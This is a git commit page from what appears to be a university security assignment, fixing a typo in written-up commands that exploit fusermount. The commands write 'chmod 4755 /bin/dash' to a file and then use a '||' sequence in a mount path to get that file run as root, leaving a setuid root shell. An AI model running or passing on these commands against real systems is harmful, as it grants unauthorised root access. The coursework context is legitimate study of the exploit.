diff options
author | Camil Staps | 2015-12-15 00:18:43 +0000 |
---|---|---|
committer | Camil Staps | 2015-12-15 00:18:43 +0000 |
commit | 6272a33aac8bcc1ab8f4b79d176e9ef2faa32e59 (patch) | |
tree | ad6dd683a3d8c1ec66966fdc94ba762ec482b32f | |
parent | Finish assignment 5 (diff) |
Fixed typo
-rw-r--r-- | CamilStaps-s4498062-Assignment-5/ex2 | 2 |
1 files changed, 1 insertions, 1 deletions
diff --git a/CamilStaps-s4498062-Assignment-5/ex2 b/CamilStaps-s4498062-Assignment-5/ex2 index 023e137..a006455 100644 --- a/CamilStaps-s4498062-Assignment-5/ex2 +++ b/CamilStaps-s4498062-Assignment-5/ex2 @@ -11,7 +11,7 @@ c Concretely, the commands used were: $ printf "chmod 4755 /bin/dash" > /tmp/exploit - $ printf 755 /tmp/exploit + $ chmod 755 /tmp/exploit $ mkdir -p '/tmp/exploit||/tmp/exploit' $ LIBMOUNT_MTAB=/etc/default/locale _FUSE_COMMFD=0 fusermount '/tmp/exploit||/tmp/exploit' fusermount: failed to open /etc/fuse.conf: Permission denied |